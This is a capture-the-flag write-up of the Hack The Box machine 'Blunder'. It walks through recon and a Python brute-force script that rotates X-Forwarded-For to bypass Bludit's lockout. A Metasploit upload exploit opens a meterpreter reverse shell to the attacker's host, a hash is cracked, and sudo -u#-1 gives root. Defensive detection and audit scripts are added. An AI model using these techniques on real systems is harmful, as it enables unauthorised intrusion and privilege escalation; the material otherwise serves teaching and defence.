Lluna's Pure land.


HTB-[blunder]

0x01. Overview

0x01. Information gathering

Only ports 21 (closed) and 80 (open) were found.

root@JIYE:~/htb/blunder# nmap -sC -sV -sT 10.10.10.191 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-18 08:32 EDT
Nmap scan report for 10.10.10.191
Host is up (0.36s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.98 seconds
root@JIYE:~/htb/blunder#

0x01. Visit port 80 first

Manual crawling of the site turned up nothing.

0x03. Scan for hidden directories

root@JIYE:~/htb/blunder# gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,php,py,cgi
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.191
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: cgi,txt,php,py
[+] Timeout: 10s
===============================================================
2020/09/18 20:46:19 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/.hta.py (Status: 403)
/.hta.cgi (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.py (Status: 403)
/.htaccess.cgi (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.cgi (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.py (Status: 403)
/0 (Status: 200)
/about (Status: 200)
/admin (Status: 301)
[ERROR] 2020/09/18 20:49:18 [!] net/http: request canceled (Client.Timeout exceeded while reading body)
[ERROR] 2020/09/18 20:49:18 [!] Get http://10.10.10.191/AT-admin.cgi.py: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/at.py: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attach.py: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attachs: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/atom.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attach_mod.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attachment.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attic: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/09/18 20:49:19 [!] Get http://10.10.10.191/attachments.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/cgi-bin/ (Status: 301)
/install.php (Status: 200)
/LICENSE (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/todo.txt (Status: 200)
===============================================================
2020/09/18 21:13:55 Finished
===============================================================
root@JIYE:~/htb/blunder#

0x04. Browse the hidden files

fergus looks like it should be a username.

0x05. Visit /admin

It turns out to be Bludit CMS.

0x06. Generate a site-specific wordlist

root@JIYE:~/htb/blunder# cewl -w wordlist.txt -d 10 -m 7 http://10.10.10.191
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@JIYE:~/htb/blunder# wc -l wordlist.txt
142 wordlist.txt
root@JIYE:~/htb/blunder#

0x07. Brute force

Brute-force script source

root@JIYE:~/htb/blunder# cat pass.py 
#!/usr/bin/python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
filename = '/root/htb/blunder/wordlist.txt'

# create a list ('wordlist') using the readlines method
with open(filename, 'r', encoding='8859') as f:
    wordlist = f.readlines()
    for i in range(len(wordlist)):
        wordlist[i] = wordlist[i].rstrip('\n')


# Generate 50 incorrect passwords (not necessary. probably.)
for i in range(50):
    wordlist.append('Password{i}'.format(i = i))
# print(wordlist)

# Add the correct password to the end of the list (not really necessary in our use case)
wordlist.append('adminadmin')

for password in wordlist:
    # fresh session per attempt: fetch the login page to pick up its CSRF token
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    # a different X-Forwarded-For value on every attempt, so Bludit's
    # per-IP failed-login counter never reaches its lockout threshold
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # a successful login redirects to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
root@JIYE:~/htb/blunder#

Brute force succeeded:

user:fergus

password:RolandDeschain

root@JIYE:~/htb/blunder# python3 pass.py 
[*] Trying: Plugins
[*] Trying: Include
[*] Trying: service
[*] Trying: Dynamic
[*] Trying: blunder
[*] Trying: interesting
[*] Trying: devices
[*] Trying: content
[*] Trying: created
[*] Trying: Creation
[*] Trying: November
[*] Trying: Reading
[*] Trying: Fantasy
[*] Trying: National
[*] Trying: players
[*] Trying: description
[*] Trying: Favicon
[*] Trying: Bootstrap
[*] Trying: bootstrap
[*] Trying: Networks
[*] Trying: Content
[*] Trying: Stephen
[*] Trying: Sidebar
[*] Trying: nothing
[*] Trying: Copyright
[*] Trying: Powered
[*] Trying: byEgotisticalSW
[*] Trying: Javascript
[*] Trying: American
[*] Trying: fiction
[*] Trying: feature
[*] Trying: published
[*] Trying: received
[*] Trying: awarded
[*] Trying: literature
[*] Trying: centers
[*] Trying: through
[*] Trying: smartphones
[*] Trying: tablets
[*] Trying: library
[*] Trying: Breaked
[*] Trying: September
[*] Trying: supernatural
[*] Trying: suspense
[*] Trying: fantasy
[*] Trying: million
[*] Trying: adapted
[*] Trying: miniseries
[*] Trying: television
[*] Trying: including
[*] Trying: Richard
[*] Trying: Bachman
[*] Trying: written
[*] Trying: approximately
[*] Trying: stories
[*] Trying: collections
[*] Trying: British
[*] Trying: Society
[*] Trying: Foundation
[*] Trying: Distinguished
[*] Trying: Contribution
[*] Trying: Letters
[*] Trying: probably
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.
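The brute-force script above only works because every attempt carries a fresh X-Forwarded-For value, so a failed-login counter keyed on that header never trips. From the defender's side that same behaviour is a clear signal. The following is an added example and not part of the original writeup: it parses constructed Apache-style access-log lines (assuming a LogFormat that appends the X-Forwarded-For header as a final quoted field, which is an assumption) and flags any real client address that POSTs to the login URL repeatedly while rotating that header.

```python
#!/usr/bin/python3
"""Spot login brute forcing that rotates the X-Forwarded-For header.

Added example, not from the original writeup. Assumes an Apache LogFormat of
  %h %l %u %t "%r" %>s %b "%{X-Forwarded-For}i"
so the header is the last quoted field (assumption). Log lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: one real client (%h) posting to the login URL with a
# different X-Forwarded-For value each time, plus two unrelated clients.
SAMPLE_LOG = """\
10.10.17.216 - - [18/Sep/2020:20:51:02 -0400] "POST /admin/login HTTP/1.1" 200 4812 "Plugins"
10.10.17.216 - - [18/Sep/2020:20:51:03 -0400] "POST /admin/login HTTP/1.1" 200 4812 "Include"
10.10.17.216 - - [18/Sep/2020:20:51:03 -0400] "POST /admin/login HTTP/1.1" 200 4812 "service"
10.10.17.216 - - [18/Sep/2020:20:51:04 -0400] "POST /admin/login HTTP/1.1" 200 4812 "Dynamic"
10.10.17.216 - - [18/Sep/2020:20:51:05 -0400] "POST /admin/login HTTP/1.1" 200 4812 "blunder"
10.10.17.216 - - [18/Sep/2020:20:51:06 -0400] "POST /admin/login HTTP/1.1" 302 0 "RolandDeschain"
192.0.2.10 - - [18/Sep/2020:20:52:00 -0400] "POST /admin/login HTTP/1.1" 200 4812 "-"
192.0.2.10 - - [18/Sep/2020:20:55:00 -0400] "POST /admin/login HTTP/1.1" 302 0 "-"
198.51.100.7 - - [18/Sep/2020:20:56:00 -0400] "GET /about HTTP/1.1" 200 3210 "-"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<xff>[^"]*)"$')


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return rec


def find_xff_bruteforce(log_text, login_path='/admin/login', window_s=60,
                        min_attempts=5, min_distinct_xff=3):
    """Return {client: {'attempts': n, 'distinct_xff': k}} for clients that POST
    to login_path at least min_attempts times inside a window_s-second window
    while presenting at least min_distinct_xff different X-Forwarded-For values.
    A single real client that changes the header per request is exactly what a
    lockout keyed on the header cannot see, but the %h field still can."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec['method'] == 'POST' and rec['path'] == login_path:
            per_client[rec['client']].append((rec['ts'], rec['xff']))

    alerts = {}
    for client, events in per_client.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the span fits in window_s
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            window = events[start:end + 1]
            distinct = {xff for _, xff in window if xff != '-'}
            if len(window) >= min_attempts and len(distinct) >= min_distinct_xff:
                prev = alerts.get(client, {'attempts': 0})
                if len(window) > prev['attempts']:
                    alerts[client] = {'attempts': len(window),
                                      'distinct_xff': len(distinct)}
    return alerts


if __name__ == '__main__':
    for client, info in find_xff_bruteforce(SAMPLE_LOG).items():
        print('%s: %d login POSTs with %d distinct X-Forwarded-For values'
              % (client, info['attempts'], info['distinct_xff']))
```

The detection keys on the real peer address rather than the forwarded header, which is the mitigation as well: a lockout that trusts X-Forwarded-For from an unauthenticated client is a lockout the client controls.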

0x08. Log in

Only static pages can be added; nothing useful there.

0x09. Reverse shell with MSF

msf5 > search bludit

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/bludit_upload_images_exec 2019-09-07 excellent Yes Bludit Directory Traversal Image File Upload Vulnerability


msf5 > use exploit/linux/http/bludit_upload_images_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > use exploit/linux/http/bludit_upload_images_exec
[*] Using configured payload php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > options

Module options (exploit/linux/http/bludit_upload_images_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
BLUDITPASS yes The password for Bludit
BLUDITUSER yes The username for Bludit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Bludit
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.87.24.78 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Bludit v3.9.2

msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => gergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.17.216
lhost => 10.10.17.216
msf5 exploit(linux/http/bludit_upload_images_exec) > options

Module options (exploit/linux/http/bludit_upload_images_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
BLUDITPASS RolandDeschain yes The password for Bludit
BLUDITUSER fergus yes The username for Bludit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.191 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Bludit
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.17.216 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Bludit v3.9.2


msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 10.10.17.216:4444
[-] Exploit aborted due to failure: no-access: Authentication failed
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 10.10.17.216:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading ELlQyVUzyq.png...
[*] Uploading .htaccess...
[*] Executing ELlQyVUzyq.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.17.216:4444 -> 10.10.10.191:50490) at 2020-09-18 22:16:21 -0400
[+] Deleted .htaccess

meterpreter > id
[-] Unknown command: id.
meterpreter > whoami
[-] Unknown command: whoami.

The www user has no permissions.

meterpreter > shell
Process 3590 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cd /home
cd /home
www-data@blunder:/home$ ls
ls
hugo shaun
www-data@blunder:/home$ cd hugo
cd hugo
www-data@blunder:/home/hugo$ ls
ls
Desktop Downloads Pictures Templates user.txt
Documents Music Public Videos
www-data@blunder:/home/hugo$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@blunder:/home/hugo$ cd ..
cd ..
www-data@blunder:/home$ ls
ls
hugo shaun
www-data@blunder:/home$ cd shaun
cd shaun
www-data@blunder:/home/shaun$ ls
ls
Desktop Documents Downloads Music Pictures Public Templates Videos
www-data@blunder:/home/shaun$

Next, look for the Bludit configuration files to find the users' password hashes.

www-data@blunder:/home/shaun$ cd /var/www/
cd /var/www/
www-data@blunder:/var/www$ ls
ls
bludit-3.10.0a bludit-3.9.2 html
www-data@blunder:/var/www$ cd bbludit-3.10.0a^[[D
cd bbludit-3.10.0a
bash: cd: bbludit-3.10.0a: No such file or directory
www-data@blunder:/var/www$ cd bludit-3.10.0a
cd bludit-3.10.0a
www-data@blunder:/var/www/bludit-3.10.0a$ ls
ls
LICENSE bl-content bl-languages bl-themes install.php
README.md bl-kernel bl-plugins index.php
www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
cd bl-content
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
ls
databases pages tmp uploads workspaces
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
cd databases
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
ls
categories.php plugins site.php tags.php
pages.php security.php syslog.php users.php
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$

Decoding site

hash: faca404fd5c0a31cf1897b823c695c85cffeb98d

user: Hugo

decoded: Password120
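Added example, not from the original writeup: a small parser for the users.php format shown above (a PHP guard line followed by a JSON object keyed by username), with an audit pass that flags what made the hash recoverable from a lookup site, namely an unsalted 40-hex-character digest, plus a verifier that also handles a salted record. The `salt` field name and the sha1(password + salt) scheme are assumptions and are not confirmed by the page.

```python
#!/usr/bin/python3
"""Read a Bludit users.php database and audit how passwords are stored.

Added example, not from the original writeup. users.php is a PHP guard line
followed by a JSON object keyed by username. The 'salt' field name and the
sha1(password + salt) scheme used by verify_password() are assumptions.
"""
import hashlib
import json
import re

# Constructed wrapper around the record shown in the writeup above.
SAMPLE_USERS_PHP = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
"""

SHA1_HEX = re.compile(r'^[0-9a-f]{40}$')


def load_bludit_users(text):
    """Strip the leading '<?php ... ?>' guard line and parse the JSON body."""
    if text.lstrip().startswith('<?php'):
        text = text.split('?>', 1)[1]
    return json.loads(text)


def bludit_hash(password, salt=''):
    """sha1(password + salt) hex digest; an empty salt means unsalted (assumed scheme)."""
    return hashlib.sha1((password + salt).encode('utf-8')).hexdigest()


def verify_password(candidate, record):
    """Check a candidate password against a user record, salted or not."""
    return bludit_hash(candidate, record.get('salt', '')) == record.get('password', '')


def audit_users(users):
    """Return (username, finding) pairs describing weak or risky storage."""
    findings = []
    for name, rec in users.items():
        pw = rec.get('password', '')
        # a bare 40-hex digest with no salt is reversible through public SHA-1 tables
        if SHA1_HEX.match(pw) and not rec.get('salt'):
            findings.append((name, 'unsalted SHA-1 password hash'))
        # the API token sits in plaintext in the same file as the hash
        if rec.get('tokenAuth'):
            findings.append((name, 'plaintext API token stored next to the hash'))
    return findings


if __name__ == '__main__':
    users = load_bludit_users(SAMPLE_USERS_PHP)
    for name, issue in audit_users(users):
        print('%s: %s' % (name, issue))
```

Because the database lives under the web root and was readable by www-data in the transcript above, anything in it (hash, API token) is exposed to whoever gets code execution as the web server user; file permissions on bl-content/databases deserve the same attention as the hashing scheme.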

0x010. Privilege escalation

Log in as Hugo

hugo  shaun
www-data@blunder:/home$ su hugo
su hugo
Password: Password120

hugo@blunder:/home$ whoami
whoami
hugo
hugo@blunder:/home$ ls
ls
hugo shaun
hugo@blunder:/home$ cd
cd
hugo@blunder:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
***************************
hugo@blunder:~$

Escalate through the sudo rule for /bin/bash

hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# whoami
whoami
root
root@blunder:/home/hugo# cd
cd
root@blunder:/# ls
ls
bin dev home lib64 media proc sbin sys var
boot etc lib libx32 mnt root snap tmp
cdrom ftp lib32 lost+found opt run srv usr
root@blunder:/# cd root
cd root
root@blunder:/root# ls
ls
root.txt
root@blunder:/root# cat root.txt
cat root.txt
*************************************
root@blunder:/root#
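The escalation works because the rule `(ALL, !root) /bin/bash` expresses "anyone except root" as a negation, and on affected sudo versions the user ID `-1` slips past that exclusion. Below is an added example, not from the original writeup, that parses constructed sudoers-style lines and flags every rule whose runas list relies on a `!` exclusion, so an administrator can rewrite it as an explicit allow-list (and keep sudo patched).

```python
#!/usr/bin/python3
"""Flag sudoers rules that restrict the runas user by negation.

Added example, not from the original writeup. The rule seen via sudo -l above,
(ALL, !root) /bin/bash, is the pattern this audit looks for: a positive 'ALL'
combined with '!user' exclusions. The sample rules below are constructed.
"""
import re

# Constructed sudoers excerpt; the hugo line mirrors the rule from the box.
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
hugo    ALL=(ALL, !root) /bin/bash
deploy  ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart app
%admin  ALL=(ALL) ALL
"""

# who  host=(runas_users[:runas_groups]) [TAG: ...] commands
RULE_RE = re.compile(
    r'^(?P<who>[%+]?\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$')


def parse_rule(line):
    """Return a dict for a user specification line, or None for anything else."""
    line = line.strip()
    if not line or line.startswith('#') or line.startswith('Defaults'):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    # only the user part of "users:groups" matters for this check
    runas_users = [u.strip() for u in m.group('runas').split(':')[0].split(',')
                   if u.strip()]
    return {
        'user': m.group('who'),
        'host': m.group('host'),
        'runas_users': runas_users,
        'negated': [u[1:] for u in runas_users if u.startswith('!')],
        'tags': [t.strip(': ') for t in m.group('tags').split() if t.strip()],
        'command': m.group('cmds').strip(),
    }


def uses_negated_runas(rule):
    """True when the rule grants a broad runas set and carves accounts out with '!'."""
    positives = [u for u in rule['runas_users'] if not u.startswith('!')]
    return bool(rule['negated']) and 'ALL' in positives


def audit_sudoers(text):
    """Return the parsed rules whose runas restriction relies on negation."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule and uses_negated_runas(rule):
            findings.append(rule)
    return findings


if __name__ == '__main__':
    for rule in audit_sudoers(SAMPLE_SUDOERS):
        print('%s may run %s as any user except %s: rewrite as an explicit allow-list'
              % (rule['user'], rule['command'], ', '.join(rule['negated'])))
```

A rule such as `hugo ALL=(www-data) /bin/bash` names the one account that is actually intended, so there is no "everything except" set for an unexpected user ID to land in.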
------------- The paper is short but the feeling runs long; see you next time -------------